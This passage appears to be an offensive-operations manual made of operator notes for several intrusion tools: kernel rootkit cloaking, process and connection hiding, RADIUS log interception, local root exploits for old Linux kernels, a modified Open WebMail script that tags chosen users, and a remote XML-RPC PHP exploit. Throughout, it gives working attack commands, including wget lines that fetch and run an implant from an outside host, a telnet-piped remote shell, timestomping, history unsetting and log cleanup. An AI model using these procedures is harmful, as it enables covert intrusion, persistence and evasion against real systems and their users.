windows: one to become privileged, ### other to stay unprivileged, for comparing outputs of commands ## get the PID of the Nopen window that will become privileged -pid ## set Nopen PID in the rest of the script mx :%s/PRIVILEGED_NOPEN_PID/PRIVILEGED_NOPEN_PID/g `x ######################################################## ## Ctrl Usage Options: # -C [pid | /file/path] Cloak the given process or file path # -c [pid | /file/path] Uncloak the given process or file path # -d Display default cloaked directory # -E pid Enable the given process's ability to see otherwise # cloaked processes and files. # -e pid Disable the given process's ability to see # otherwise cloaked processes and files. # -F pid Enable the given process's ability to see otherwise # cloaked files ONLY. # -f pid Disable the given process's ability to see # otherwise cloaked files ONLY. # -P pid Enable the given process's ability to see otherwise cloaked # processes ONLY. # -p pid Disable the given process's ability to see otherwise cloaked # processes ONLY. # -K pid Designate a process as to be killed upon shutdown # -k pid Designate a process as to NOT be killed upon shutdown # -r /bin/sh Execute the given program as the root user # -T signal Send the specified signal to all killable cloaked processes. # -U Invoke a full uninstall (self destruct) # -u Invoke a partial uninstall (unpatch and unload) # -s path Set the times associated with a given file path # -g path Get the times associated with a given file path ######################################################## ## upload SS Control Utility using nopen -put /current/up/Ctrl c ## or ftshell ~~p /current/up/Ctrl c ### If Nopen already a privileged process (i.e. started by a child of DD, ### etc.), do not need to set SEED variable to use Ctrl, otherwise SEED ### must be set ## SEED calculation algorithm. WARNING do this off target!!! seedcalc TARGET_HOSTNAME ## if you don't have 'seedcalc' echo -n TARGET_HOSTNAME | rev | tr -d '\n' | md5sum | cut -f1 -d' ' ## if you don't have 'rev' echo -n TARGET_HOSTNAME | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tr -d '\n' | md5sum | cut -f1 -d' ' ## set value of SEED in the rest of the script mx :%s/CALCULATED_SEED/CALCULATED_SEED/g `x ## REMINDER: DO NOT USE THIS OUTPUT EXPLICITLY IN AN UNPRIVILEGED PROCESS WHEN ## ACCESSING FILESYSTEM, SEE WARNING AT THE TOP OF THE SCRIPT ## WARNING: WHEN CLOAKING PROCESSES, MUST MAKE SURE THAT NO CLOAKED PROCESS IS ## IS THE PARENT OF AN UNCLOAKED PROCESS. IF NECESSARY TO HAVE A ## PROCESS UNCLOAKED, MUST UNCLOAK PARENTS ALL THE WAY TO INIT (i.e. if ## need an uncloaked Nopen, Nopen listener must be uncloaked as well) ## Use Ctrl to determine the name of the Cloaked directory SEED=CALCULATED_SEED PATH=. c -d ## Use Ctrl to enable Nopen to see cloaked processes, connections and files. SEED=CALCULATED_SEED PATH=. c -E PRIVILEGED_NOPEN_PID ## Use Ctrl to cloak the Nopen process, connections. SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID ## Optional - Designate Nopen to NOT be killed should the implant be ## shutdown (self-destruct). You won't get any notification that this happened. SEED=CALCULATED_SEED PATH=. c -k PRIVILEGED_NOPEN_PID ## Or, can do the above three actions in one command line SEED=CALCULATED_SEED PATH=. c -C PRIVILEGED_NOPEN_PID -E PRIVILEGED_NOPEN_PID -k PRIVILEGED_NOPEN_PID ## can replace PRIVILEGED_NOPEN_PID with the PID of any process you'd like to hide ## Find your nopen connections -- consider narrowing the search as you probably also ## already know your connection ip and port netstat -an | grep REDIRECTOR_IP ## set Nopen Port in the rest of the script mx :%s/NOPEN_PORT/NOPEN_PORT/g `x ## Find nopen using the privileged process. Verifies you can find Nopen in ## ps and netstat listings when privileged ps -ef | grep PRIVILEGED_NOPEN_PID netstat -an |grep NOPEN_PORT ## in an unprivileged window, these should unsuccessful if Nopen was cloaked ## in an earlier Ctrl command ps -ef | grep PRIVILEGED_NOPEN_PID netstat -an | grep NOPEN_PORT ## You should now be able to see the cloaked directory ## The cloaked directory MAY be in one of the following. Refer to what ## the `pwd` from Dewdrop returned -lt /var/tmp -lt /lib -lt /dev -lt /etc -lt / ### APPENDIX ## DATE Errors ## ## 1 LOADER_ERROR_UNKNOWN ## The requested action failed for an unknown reason. ## 2 LOADER_ERROR_MEMORY ## There was a problem allocating memory. ## 3 LOADER_ERROR_READ_FILE ## There was a problem reading file data. ## 4 LOADER_ERROR_EXTRACT_PAYLOAD ## Could not extract payload data. ## 5 LOADER_ERROR_INVALID_PAYLOAD ## Payload data is invalid. ## 6 LOADER_ERROR_MERGE_ARCHIVE ## Could not merge old archive with new during an upgrade. ## 7 LOADER_ERROR_GENERATE_PAYLOAD ## Could not generate new payload data during an upgrade. ## 8 LOADER_ERROR_BUFFER_TOO_SMALL ## The given buffer is too small to hold the requested data. ## 9 LOADER_ERROR_LIST_BUFFER_TOO_SMALL ## The given array is too small to hold all the requested data elements. ## 10 LOADER_ERROR_SYSINFO ## Could not determine the host system information. ## 11 LOADER_ERROR_ENUMERATE_PLATFORM_TAGS ## Could not enumerate platform types. ## 12 LOADER_ERROR_ENUMERATE_OBJECTS ## Could not enumerate objects associated with a tag. ## 13 LOADER_ERROR_READ_OBJECT ## Could not read object data or meta-data. ## 14 LOADER_ERROR_WRITE_OBJECT ## Could not write object data or meta-data. ## 15 LOADER_ERROR_LOAD_USER_MODULE_OBJECT ## Could not load a user module data object. ## 16 LOADER_ERROR_EXECUTE_OBJECT ## Could not execute an executable data object. ## 17 LOADER_ERROR_KERNEL_SHUTDOWN ## Could not unload existing kernel modules. ## 18 LOADER_ERROR_KERNEL_PLATFORM ## Payload does not contain any kernel modules for this platform. ## 19 LOADER_ERROR_KERNEL_INJECT ## Could not inject modules into the running kernel. ## 20 LOADER_ERROR_KERNEL_INVOKE ## Could not invoke a required kernel service. ## 21 LOADER_ERROR_PERSIST_ENABLE ## Could not enable persistence. ## 22 LOADER_ERROR_PERSIST_READ ## Could not read persistant executable. ## 23 LOADER_ERROR_HOSTID ## Hostid of system did not match the one stored in the archive. ## 24 LOADER_ERROR_EXECL ## Error calling execl(3) when invoking the 64-bit version of the Loader. ## 25 LOADER_ERROR_FORK ## Error calling fork(2) when invoking the 64-bit version of the Loader. ## 26 LOADER_ERROR_WAITPID ## Error calling waitpid(2) when invoking the 64-bit version of the Loader. ## 27 LOADER_ERROR_SIGACTION ## Error calling sigaction(2) when setting the Loader process signal handlers. ## 28 LOADER_ERROR_SIGADDSET ## Error calling sigaddset(2) when setting the Loader process signal handlers. ################################################################################### ### ### END File user.tool.stoicsurgeon.COMMON ### (see also ../etc/user.tool.stoicsurgeon.COMMON) ### ### BEGIN File user.tool.dittlelight_hidelite.COMMON (see also ../etc/user.tool.dittlelight_hidelite.COMMON) ### ############################################################ # DITTLELIGHT (HIDELIGHT) ############################################################ ### To run the unix oracle db scripts, you must do them outside of an INCISION process ### therefore, you can use DITTLELIGHT (HIDELITE) to unhide your nopen window ### You must run HIDELIGHT on a process with a parent PID of "1" so ### do a callback to your redirector and run hidelite on the callback window ### Hidelite ### Create a callback window # On redirector: -nrtun NOPEN_PORT # On target: -call REDIR_IP NOPEN_PORT ### upload the correct version of hidelite for sparc or linux in a temp directory: mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/bin/hidelite.sparc crond # or -put /current/bin/hidelite.linux crond ### Obtain the PIDs of your nopen windows. ### The callback window will have a parent pid of (1): ### Run -pid in each nopen window: -pid ### In a nopen window OTHER than the callback window you are about to unhide, ### run hidelite to unhide the callback window: ./crond -u -p NOPEN_CALLBACK_WINDOW_PID ### Remove hidelite from the target: -rm crond ### In the CALLBACK window, verify that this window has now lost its INCISION privileges ### and can no longer see the other nopen PIDS ps -ef | grep NOPEN_PID ### In any window, you can run =psdiff to verify that either the callback window is ### unhidden or that the other (INCISION privileged) nopen windows are invisible ### to the callback window. =psdiff ### You can now run the oracle queries in the UNHIDDEN CALLBACK window. ### When done, simply -exit the unhidden callback window. ### If for some reason you need to rehide a process, upload HIDELITE ### and run the following from a HIDDEN (privileged) window: ### To hide again ./crond -h -p NOPENPID -rm crond ### If you were running oracle commands, you can now clean them up: ### Cleanup the logs created from the oracle scripts: ### ex: # -ls -t /opt/mnt/oracle/product/9.2.0/rdbms/audit # -rm # -touch /opt/mnt/oracle/product/9.2.0/rdbms/audit/ora_1473.aud /opt/mnt/oracle/ product/9.2.0/rdbms/audit ### Remove your working directory and -burn nopen when done with op -cd /tmp -rm .scsi -lt /tmp -burnBURN ### ### END File user.tool.dittlelight_hidelite.COMMON ### (see also ../etc/user.tool.dittlelight_hidelite.COMMON) ### ### BEGIN File user.tool.draftbagger.COMMON (see also ../etc/user.tool.draftbagger.COMMON) ### ##### DRAFTBAGGER ##### ### Assumes have already talked to SNAT via SnatLp ### Search/replace commands :%s/ROUTER_IP/ROUTER_IP/g :%s/PROXY_IP/PROXY_IP/g :%s/RADIUS_IP/RADIUS_IP/g :%s/RANDOM_HIGH/RANDOM_HIGH/g ### These aren't really means to be used as search/replace in this script, more ### placeholders for the example commands, but here are the commands anyway, ### commented out so you really shouldn't run them #:%s/LOCAL_TUNNEL_COMMANDS_PORT/LOCAL_TUNNEL_COMMANDS_PORT/g #:%s/NOPEN_PID/NOPEN_PID/g #:%s/PARTIAL_MATCH_TARGS/PARTIAL_MATCH_TARGS/g #:%s/EXACT_MATCH_TARGS/EXACT_MATCH_TARGS/g ### get the date of the current radius log on the radius server -lt /var/log/radius/ # (find the most current, should be last file in list) -lt /var/log/radius/ # (file needed is the acct.log file) ### run the following from radius server -gs parse_rads -h # (for -gs parse_rads usage syntax) -gs parse_rads ROUTER_IP RANDOM_HIGH /var/log/radius/CURRENT_DATE/acct.log ### Will check to make sure the log file exists, check to makes sure the ### "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp" command was run, and then ### starts a "tail -f" on the logfile to constantly bring the file home, ### this gives you two pastables: a "-tunnel PORT udp" command to run on the ### radius server, and a "parse_rads.pl" one to run in a locally scripted window ### run the "-tunnel" (use the one spit out, the one below is an example) on ### the box that will be talking to SNAT -tunnel LOCAL_TUNNEL_COMMANDS_PORT udp ### IN A LOCALLY SCRIPTED WINDOW (pastable given by -gs parse_rads command) parse_rads.pl -h # for help with pastable options (run locally) ### Below is an example command, will need to use the pastable spit out by ### "-gs parse_rads" for the current session, but some things will need to ### be added to the command spit out, i.e. -p/-P args (phone numbers), the ### -R arg (treat already downloaded data as real-time, i.e. set up initial ### rules based on it), the IP address of the proxy, and any other stuff to ### play with ### ### -N -a -i are filled in by -gs parserads. Others need to be added manually PORT=LOCAL_TUNNEL_COMMANDS_PORT parse_rads.pl -NRADIUS_IP:NOPEN_PID -a127.0.0.1:RANDOM_HIGH -i/current/down/HOSTNAME.RADIUS_IP/var/log/radius/CURRENT_DATE/acct.log -p PARTIAL_MATCH_TARGS -P EXACT_MATCH_TARGS -R PROXY_IP ### Will ask for pager numbers, and ask for confirmation that a sufficiently ### up-to-date version of SNAT is being used, go ahead and confirm these ### Should be able to get other instructions for DRAFTBAGGER UI ### when Op is complete, in the DB command window, run the following to close out ### NOTE: ANSWER "no" TO THE PROMPT ASKING WHETHER TO KEEP THE SNAT ### FILTERS ACTIVE diediedie ### Ctrl-C your "tail -f" command on RADIUS server, or kill the appropriate pid ### In a local window, you can use the scripts "closetunnel" and "dotunnel" to ### interact with a -tunnel listening on a port for commands rather than stdin ### (i.e. "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp") ### "dotunnel" will send all command line args to that port for -tunnel to get ### "closetunnel" has hard-coded "c 1 2 3 4 5 6 7", and then "q"...this will ### get the Nopen prompt back # Examples: dotunnel s dotunnel l 1390 1.2.3.4 139 closetunnel ### CLOSE OUT THE REST OF THE OP AS YOU WOULD NORMALLY ### ### END File user.tool.draftbagger.COMMON ### (see also ../etc/user.tool.draftbagger.COMMON) ### ### BEGIN File user.tool.elgingamble.COMMON (see also ../etc/user.tool.elgingamble.COMMON) ### ####################################### # ELGINGAMBLE ####################################### ### local exploit for the following operating system versions: ### Linux 2.6.13 - 2.6.17.4 and certain distros that contain a backport of the ### vulnerable functionality ### Local exploit for the public prctl core dump vulnerability in recent Linux kernels. ### It takes advantage of an input validation/logic error in the kernel to create ### a cron script that will spawn a root shell. ### OPSEC: ### vulnerability: public ### exploit: public ### ### CHECK IF TARGET IS VULNERABLE ### ### check OS (for Linux 2.6.13 - 2.6.17.4) uname -a ### make sure crond is running: ps -ef | grep crond ### check if you have READ permission on /etc/cron.d (WRITE is part of the vuln.): -lt /etc/cron.d ### make sure you have EXECUTE permission on crontab: which crontab -lt /usr/bin/crontab ### check if there is a cron.allow or cron.deny that might hinder your success: -lt /etc/cron* -cat /etc/cron.allow -cat /etc/cron.deny ### ### if the above checks pass, you can try running it: ### USAGE: # elgingamble: # -h (optional) Prints a help message # -d (optional) Used to specify the system cron directory (defaults /etc/cron.d) # -p (optional) Used to specify the core file prefix (defaults cron.PID) # -s (optional) Used to specify a shell besides /bin/sh # -t (optional) Used to specify the exploit timeout (defaults 5 minutes) ### upload to target: -put /current/up/elgingamble eg ### within nopen, run it from within -shell -shell ./eg # You'll see the following messages, you must wait for the cronjob to run: # can't set core limit, trying indirect # crontab installed # must do crontab -r when finished # waiting for re-exec, ETA 60-120s # after waiting for the cronjob, run the following and start a new noserver # once you gain root access: unset HISTFILE unset HISTSIZE unset HISTFILESIZE id PATH=. sendmail ### connect to privileged noserver: -nstun TARGET_IP ### CLEANUP: crontab -l crontab -r -lt /etc/cron.d -rm /etc/cron.d/core.PID -rm eg sendmail -lt ### LOGS: -lt /var/log/cron -tail /var/log/cron ### ### TROUBLESHOOTING ### # Exploit fails with message "kernel not vulnerable". The kernel is not vulnerable # to exploitation. # Remedy:None # Exploit fails with message "failed: indirect". The exploit tried and failed to # have cron call it indirectly to bypass resource limitations. This can occur if # the crontab program is not installed, could not be found, or is restricted through # the use of cron.allow and cron.deny. # Remedy:Make sure crontab is installed on the system and useable by the system # user you use to run the exploit. # Exploit fails with message "failed". The exploit was unable to elevate to root. # This indicates that the cron command was never executed. One possible reason for # failure is if the coredump created in the system cron directory is too small to # contain a valid cron command. Other reasons could be that the cron directory # is not accessible by non-priveleged users, or the cron daemon is not running on the system. # Remedy:Make sure the cron daemon is running and the user running the exploit # has read access to the system cron directory. Also check the core file limit. # # Description: Any other failure message. Remedy: Make sure the default exploit parameters, # such as cron directory and core file prefix, are valid for the target system. # If not, rerun the exploit and specify the appropriate parameters on the command line. ### ### END File user.tool.elgingamble.COMMON ### (see also ../etc/user.tool.elgingamble.COMMON) ### ### BEGIN File user.tool.enoltog.COMMON (see also ../etc/user.tool.enoltog.COMMON) ### ####################################### # ENOLTOG ####################################### ### Software modification to the Open WebMail software to target specific users of interest. ### Used to insert a FOXACID/HUFFMUSH tag. ### Version 1 will target the first five users to login into the system. ### Version 2 will target specific users. ### NOTE: Due to the uniqueness of each target and the source code modification required, ### SUGGEST DEVELOPER BE PRESENT DURING INITIAL DEPLOYMENT TO TARGET!!!!!! ### ### OPSEC: # anyone viewing the source file will be able to see the added code. ### INITIAL INSTALLATION PROCEDURE: ### access target ### pull original openwebmail file locate openwebmail-main.pl -get /var/www/cgi-bin/openwebmail/openwebmail-main.pl ### ### LOCALLY do the following: ### ### make a backup copy cd /current/up cp /current/down/HOSTNAME//var/www/cgi-bin/openwebmail/openwebmail-main.pl /current/up/openwebmail-main.pl ### edit ##ONE## of the following files, depending on the deployment type: ### For openwebmail-main-first-five-users.pl: ############################################# # change the "<5" to the correct number of users # change the target tag in the gif line - should NOT reuse the same # target tag on different projects!!!! ### For openwebmail-main-users-time.pl: ############################################# ### determine the md5sum on each user: echo -n USERNAME | md5sum ### use the md5sum as the tasking name in the lines that begin with "$md5 eq" # change the target tag in the gif line - should NOT reuse the same # target tag on different projects!!!! ### next, edit the local copy of the original file, and insert the code from the above ### step in the correct places vi /current/up/m ### ### On target, upload the modified openwebmail: ### mkdir /tmp/.scsi -cd /tmp/.scsi -put openwebmail-main.pl m -put openwebmail-test.pl o ### test that the version will first work: ./o -ls -strings rpm.db -rm o rpm.db ### get ready to overwrite: md5sum /var/www/cgi-bin/openwebmail/openwebmail-main.pl diff /var/www/cgi-bin/openwebmail/openwebmail-main.pl m -ls /var/www/cgi-bin/openwebmail -ls cat m > /var/www/cgi-bin/openwebmail/openwebmail-main.pl ### fix timestamps -touch /var/www/cgi-bin/openwebmail/openwebmail-folder.pl /var/www/cgi-bin/openwebmail/openwebmail-main.pl -ls /var/www/cgi-bin/openwebmail ### ### LOGGING: ### locate access -ls /var/log/httpd -tail /var/log/httpd/access_log tail -300 /var/log/httpd/access_log|grep openwebmail-main.pl ### ### CLEANUP DIRECTORY: ### -rm m -cd .. -rm .scsi -ls -t ### TROUBLESHOOTING: # Determine the MD5 digest of the user echo -n | md5sum # Determine if showthread.php is executable -ls /var/www/cgi-bin/openwebmail/openwebmail-main.php # upload and run test script openwebmail-test.pl -put /current/up/openwebmail-test.pl o ./o # should see 1 2 # clean up results ### ### END File user.tool.enoltog.COMMON ### (see also ../etc/user.tool.enoltog.COMMON) ### ### BEGIN File user.tool.excelberwick.COMMON (see also ../etc/user.tool.excelberwick.COMMON) ### ####################################### # EXCELBERWICK ####################################### ### remote exploit against xmlrpc.php on Unix platforms ### ### WILL REQUIRE LOCAL ELEVATION ### sybil location: CGI-BIN ### Exploits a vulnerability in the XML-RPC PHP script. The vulnerable ### file is used in a large number of web applications, such as Drupal, ### b2evolution, and TikiWiki. The vulnerability is the result of ### unsanitized data being passed directly to the eval() call ### in the parseRequest() function of the XML-RPC server ### OPSEC: ### vulnerability: public ### exploit: public ### Usage: # ./xp_xmlrpc.pl usage: ./xp_xmlrpc.pl -i -d -c -i -d -p -o -v -a 0: /xmlrpc.php 1: /blog/xmlrpc.php 2: /blog/xmlsrv/xmlrpc.php 3: /blogs/xmlsrv/xmlrpc.php 4: /drupal/xmlrpc.php 5: /phpgroupware/xmlrpc.php 6: /wordpress/xmlrpc.php 7: /xmlrpc/xmlrpc.php 8: /xmlsrv/xmlrpc.php 9: /b2/xmlsrv/xmlrpc.php 10: /b2evol/xmlsrv/xmlrpc.php 11: /community/xmlrpc.php 12: /blogs/xmlrpc.php -c Examples: 1) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"uname -a;ls -la;w" 2) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -Osendmail;chmod +x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null" ### Check if PHP is there: # from redirector: -scan http TARGET_IP # The response should include "PHP/" though the version doesn't necessarily matter # Ex. response: Server: Apache/2.0.40 (Red Hat Linux) mod_perl/1.99_05-dev Perl/v5.8.0 mod_auth_pgsql/0.9.12 PHP/4.2.2 mod_python/3.0.0 Python/2.2.1 mod_ssl/2.0.40 OpenSSL/0.9.6b DAV/2 mx :%s/TARGET_IP/TARGET_IP/g :%s/WEB_PORT/WEB_PORT/g :%s/NETCAT_PORT/NETCAT_PORT/g :%s/REDIR_IP/REDIR_IP/g :%s/NOPEN_PORT/NOPEN_PORT/g 'x ### Then check if vulnerable by running the "-a" option to exhaust all options # WEB-PORT is usually '80' unless the target is using something else, or you # choose to tunnel it differently # redirector: -tunnel l WEB_PORT TARGET_IP # local script window: ./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -a -c"w" ### Look through the output; a successful hit will be followed by ### the results of the command issued by the "-c" option, in the suggested case, ### the results of "w' ### Each unsuccessful version will be followed by "404 not found" errors ### If the previous command yielded a successful attempt, then run the exploit again ### but substitute the version that was successful instead of using "-a" ### Prepare the appropriate nopen version with an http header: # Locally: ls -l /current/up/noserver file noserver echo -e 'HTTP/1.0 200\n' > new cat new ../up/morerats/noserver*-i586.pc.linux.gnu.redhat-5.0 > /current/up/sendmail nc -l -v -p NETCAT_PORT < sendmail # on redirector: -nrtun NOPEN_PORT ### Replace "VERSION" with the appropriate php script, then run exploit to upload and execute nopen: ./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://REDIR_IP:NETCAT_PORT/sendmail -Osendmail;chmod +x sendmail;D=-cREDIR_IP:NOPEN_PORT PATH=. sendmail) 2>/dev/null" ### connect: -nstun TARGET_IP ### ### TROUBLESHOOTING: ### # Try this to get interactive windows (you'll type in one, and get output in the other): mx :%s/PORT1/PORT1/g :%s/PORT2/PORT2/g 'x # Local scripted window #1: nc -l -vv -p PORT1 # Local scripted window #2: nc -l -vv -p PORT2 # Local scripted window #3: ./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"sleep 100 | telnet REDIR_IP PORT1 | /bin/sh | telnet REDIR_IP PORT2" ### ### CLEANUP: ### # Logging directory depends on type of web software running on target (check -find): # Try /var/log/httpd: # access_log # referer_log # error_log ### ### END File user.tool.excelberwick.COMMON ### (see also ../etc/user.tool.excelberwick.COMMON) ### ### BEGIN File user.tool.dittoclass.COMMON (see also ../etc/user.tool.dittoclass.COMMON) ### ##### DITTOCLASS ##### ### Search/replace commands ### OLD PKG NAME: if DC prev installed, name of pkg, if not then leave alone ### OLD DITTOCLASS DIR: if DC prev installed, directory where it was installed ### NEW PKG NAME: name of new DC installation package ### NEW DITTOCLASS DIR: directory where DC will be installed :%s/OLD_PKG_NAME/OLD_PKG_NAME/g :%s/OLD_DITTOCLASS_DIR/OLD_DITTOCLASS_DIR/g :%s/NEW_PKG_NAME/NEW_PKG_NAME/g :%s/NEW_DITTOCLASS_DIR/NEW_DITTOCLASS_DIR/g ### Check to see if DITTOCLASS already on target (if fails, not implanted). ### Make sure check for other implants too. ### NOTE: Must use "cat", "-cat" will not work ### Doing "cat /proc/OLD_PKG_NAME" will register you to see hidden resources ### If neither of the "cat" commands work and you think there is an old ### installation, the "ls" command below should still work, if not there is ### probably nothing there cat /proc/listfiles cat /proc/OLD_PKG_NAME ls -la /OLD_DITTOCLASS_DIR/OLD_PKG_NAME ### If DITTOCLASS already there but needs to be upgraded, go ahead and ### uninstall it, if not skip to "Upload the DC package and run..." -ls /OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh # If it exists /OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh ### After uninstall, in a NOPEN window, grep for the old package name ### and kill any of the processes associated with it netstat -anlp | grep OLD_PKG_NAME ps -ef | grep OLD_PKG_NAME kill -9 OLD_PKG_NAME_PIDS ### Make sure old connections/processes gone netstat -anlp | grep OLD_PKG_NAME ps -ef | grep OLD_PKG_NAME ### Make sure unable to connect with hector if connected with hector before # Use whatever command used to get on cd /current/bin hector .... # your previous hector command line ### Upload the DC package and run the install script ### Removes itself upon installation -put /current/up/NEW_PKG_NAME.tar.gz m.tar.gz2 tar zxvf m.tar.gz -lt ./install.sh ### Assuming installation script did not return any errors... ### Check to see if DC is seemingly working by seeing if the files are ### in fact being hidden -lt /NEW_DITTOCLASS_DIR/ # should NOT see NEW_PKG_NAME in this listing -lt /NEW_DITTOCLASS_DIR/NEW_PKG_NAME # SHOULD see NEW_PKG_NAME in this listing ### A little bit more search/replace fun ### TARGET IP: duh ### TARGET TRIGGER PORT: duh ### HECTOR CALLBACK IP: the IP for target to callback to (probably the window ### with the -tunnel) ### HECTORi CALLBACK PORT: the port for target to callback to ### RAWSEND PORT: local port to redirect the trigger packet ### SPOOF SRC IP: source IP of trigger packet ### BACKDOOR KEY: key to verify whether to call back or not ### should be located in: ### /current/bin/varkeys/projectname/ip.host/dittoclass :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_TRIGGER_PORT/TARGET_TRIGGER_PORT/g :%s/HECTOR_CALLBACK_IP/HECTOR_CALLBACK_IP/g :%s/HECTOR_CALLBACK_PORT/HECTOR_CALLBACK_PORT/g :%s/RAWSEND_PORT/RAWSEND_PORT/g :%s/SPOOF_SRC_IP/SPOOF_SRC_IP/g :%s/BACKDOOR_KEY/BACKDOOR_KEY/g ### Setup tunnel on redirector to contact agamemnon with hector -tunnel u TARGET_TRIGGER_PORT TARGET_IP r HECTOR_CALLBACK_PORT ### Setup -rawsend for hector -rawsend RAWSEND_PORT ##### Connect to agamemnon from LOCAL WINDOW cd /current/bin ### For hector help in case need to play with the trigger line and the ### -tunnel stuff to get it right ./hector -v -h ./hector --backdoor --target-ip TARGET_IP --dest-port TARGET_TRIGGER_PORT --spoof-srcip SPOOF_IP --listen-port HECTOR_CALLBACK_PORT --control-ip HECTOR_CALLBACK_IP --udp -Z 127.0.0.1:RAWSEND_PORT --backdoor-trigger BACKDOOR_KEY ### Once connected to target thru hector mkdir /tmp/.pci cd /tmp/.pci !help! ### To send a file via hector ### NOTE: Assume the working dir on target is "/tmp/.dir" ### Uploading the filename "crond" will be named "/tmp/.dir/crond" on target ### Uploading the filename "/etc/passwd" will be named "/tmp/.dir/_etc_passwd" ### on target ### Upload and run a NOPEN listener !sendfile! cp /current/up/morerats/NOPEN_TO_UPLOAD /current/bin/crond crond # what called noserver in /current/down/HOSTNAME.TARGET_IP PATH=. D=-lRANDOM_PORT crond ### From redirector: -nstun TARGET_IP:RANDOM_PORT ### Or callbacks (may need to use this for multiple windows instead of -call) PATH=. D=-cHECTOR_CALLBACK_IP:RANDOM_PORT crond -nrtun RANDOM_PORT -call HECTOR_CALLBACK_IP:RANDOM_PORT ### Register to be allowed to see hidden files/processes/conns !register! # Enter the new package name at prompt "Please enter the package name:" NEW_PKG_NAME # must see NEW_PKG_NAME> REGISTERED to know you are successful ### Hide processes and ports from hector window # In each nopen window: -pid ps -auxww | grep crond netstat -an | grep HECTOR_CALLBACK_IP # Hide process in hector window (to unhide, run !unhideproc!) !hideproc! Please enter the Process ID you wish to unhide: PID_TO_HIDE # Confirm in unregistered nopen window that pid is hidden ps -auxww | grep PID_TO_HIDE # Hide connection in hector window (to unhide, run !unhideconn!) # NOTE: Always hide the end of the redirector, don't hide the target's # Otherwise, legitimate connections might not show up !hideconn! Please enter the IP Address you wish to hide: HECTOR_CALLBACK_IP Please enter the port you wish to hide: NOPEN_PORT # Confirm in unregistered nopen window that conn is hidden netstat -an | grep NOPEN_PORT # make sure processes and connections are hidden !listconns! !listprocs! # to exit hector ### Startup script ### Can modify startup script to add strifeworld or other progs that ### need to be started on boot -lt /etc/rc#.d/S55NEW_PKG_NAME -get /etc/rc#.d/S55NEW_PKG_NAME ### After modified... -put MODIFIED_SCRIPT s touch -r /etc/rc#.d/S55NEW_PKG_NAME t cat s > /etc/rc#.d/S55NEW_PKG_NAME touch -r t /etc/rc#.d/S55NEW_PKG_NAME -rm s t #################################################################### ### ### END File user.tool.dittoclass.COMMON ### (see also ../etc/user.tool.dittoclass.COMMON) ### ### BEGIN File user.tool.expitiatezeke.COMMON (see also ../etc/user.tool.expitiatezeke.COMMON) ### ############################# ### EXPITIATEZEKE ############################# ### local exploit against the Linux 2.6.5 - 2.6.6 Fedora Core 2 kernel. ### EXPITIATEZEKE takes advantage of the chown vulnerability which allows ### you change the gid on any file on the system to the current users gid. ### This exploit is packaged into a single executable that when run ### will create a temporary file (shell spawning program), change the ### group owner of the device file of the partition that the temp file ### resides on (i.e. If the temp file was /tmp/file12345678 and /tmp was ### mounted on /dev/hdb3 then the device file /dev/hdb3 would have its ### group ownership changed.) ### After this takes place a cache flushing procedure occurs syncing the ### running filesystem with the contents of the disk. ### Once this finishes and if successful, a root shell is returned to the operator. ### OPSEC: vulnerability - public ### NOTE: This will cause a temporary CPU spike during execution; care should be taken ### to determine the risk if there are active users on the target ### ### Get a "before" picture of the device where /tmp resides ### # find the device that is mounted on /tmp (ex.- /dev/hdb3) and make note; # if /tmp does not have its own filesystem, use the device of "/" df -k # look at the perms of the DEVICE, then make note of the group id; typically should be "disk" # ex: -ls /dev/hdb3 -ls # correlate the groupid to a digit by finding it in /etc/group, then save the numeric value # ex: -grep disk /etc/group -grep /etc/group ### ### upload and execute ### -put /current/up/exze exze # run the script (within nopen, use -shell) -shell ./exze ### A status code will show up while the program is running. ### The following value should indicate potential success: 0x000 ### The should be the same as you found out from the initial checks ### MAKE NOTE OF THE VALUE REPORTED BACK ON THIS INITIAL ATTEMPT IN CASE OF FAILURE!!! ### Any value other than 0x000 is an error code (see other documentation) ### Wait about 5 minutes (for the cache flushing) and you should get a root prompt, then: unset HISTFILE unset HISTSIZE unset HISTFILESIZE id # start a new noserver PATH=. crond ### ### IF AT FIRST YOU DON'T SUCCEED....... try, try..... the following in order: ### ### If you received an error that permissions didn't change, you may try again. ### Next, try using the -r option. This option will prevent the temporary shell ### file from being removed if there is an error so that the operator will have a chance ### to do the cache flushing manually. -shell ./exze -r ### if successful, run the "unset"s from above - you have root and can cleanup ### If the 'permissions didn't change' error still happens, the flushing procedure ### will need to be performed manually before proceeding to the next step. find / -type f -exec cat {} \; > /dev/null ### ONLY AFTER the 'find' completes, check the permissions of the shell file in /tmp: ### should be rws--x--- and owned by root ### DO NOT EXECUTE, OPEN, READ, OR WRITE TO THE SHELL FILE BEFORE THE EXPLOIT FINISHES ### AS IT MIGHT UNDO THE CHANGES MADE TO THE DISK!! THIS MEANS DO NOT DO AN LS ### ON THE FILE OR TOUCH IT IN ANY MANNER UNTIL THE EXPLOIT COMPLETES. -lt /tmp ### if the permissions have changed, then manually attempt to get a root shell; ### the -d and -i options will attempt to perform the cleanup of the shell file in /tmp ### and reset the group perms of the DEVICE -lt /tmp -shell /tmp/file<######> -d -i ### if you don't get root by now, you probably won't ### ### CLEANUP ### ### no cleanup if successful the first time, however.... ### there may be cleanup involved under the following conditions: ### the exploit did NOT work on the first attempt ### the exploit was aborted ### the connection to target was dropped ### check the group id of the DEVICE where /tmp resides; ### if the group is not the same as it was originally, set it to ### the gid echoed back in your INITIAL ATTEMPT (digit following 0x000) ### NOTE: if you didn't get root, you may not be able to chgrp the device ### but hopefully, the exploit will have set it to gid '0' to be ### less 